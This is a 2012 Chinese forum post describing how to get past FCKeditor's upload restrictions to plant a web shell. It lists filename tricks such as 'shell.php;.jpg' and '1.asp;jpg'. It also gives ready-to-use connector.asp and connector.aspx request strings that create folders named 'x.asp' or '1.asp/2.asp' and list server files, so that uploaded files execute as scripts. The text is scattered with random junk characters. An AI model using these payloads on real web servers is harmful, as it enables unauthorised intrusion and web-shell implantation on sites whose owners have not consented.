很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg9 R; m: R7 a" z$ H. L6 U
* I4 S: S4 Z0 i3 |% ?" T# ^' i提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
3 V. ]# w# V5 V/ z
' n8 q, n P" E& r6 v继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
& W$ X0 Z8 n( I) u {* _% I; R2 M, W
$ O) O; |! U+ _) D. |; `7 q+ M突破建立文件夹:
& D+ S3 @ W0 F
7 Q; Y; o3 [7 E Heditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp1 `+ I* R: B; w b2 U5 A; t
. K: i1 f3 K! |5 P参数:! j+ h6 `4 H2 U% B: G
/ u8 |, l. e( ?& b: ]
当前目录名:CurrentFolder=/qing.asp
2 j* g- t% q( D0 f k/ Q! n$ w7 y4 ^
新的目录名:NewFolderName=x.asp
/ ~6 @9 e( s, t/ w c, d
* P( g3 W5 r/ b# p. ^$ @& o7 v其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……7 r+ s0 E! B: R6 b. Z# k% G
; Z J+ E" j, T* _: R& Y. G {* n那么 x.asp 就已经建立生成了,此方法百试百灵!
1 f/ P/ H: [$ c# O9 \
2 L/ V/ Z2 F' z: l7 h5 G7 Z# g6 n新建文件夹参数 x.asp,基本都能搞定。+ s L1 Q4 z3 O: L5 y4 I' z: ~
/ c% q; \1 _; W! A" E下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
) r$ ~+ c8 u& C y+ \) |$ L9 g% u" c& E: {8 N
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp" Q* d6 q: i; ~+ Z4 G" ^$ V
# ^1 @6 l1 Z" J2 N( m0 u
获取文件列表; W) i6 l$ ?/ k. k- ~8 o
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
Y: T/ a, Y& H2 |
. K1 n H" d' I2 S1 ^6 G& ^2 Y% L |
发表于 2012-12-31 09:27:09
收藏
支持
反对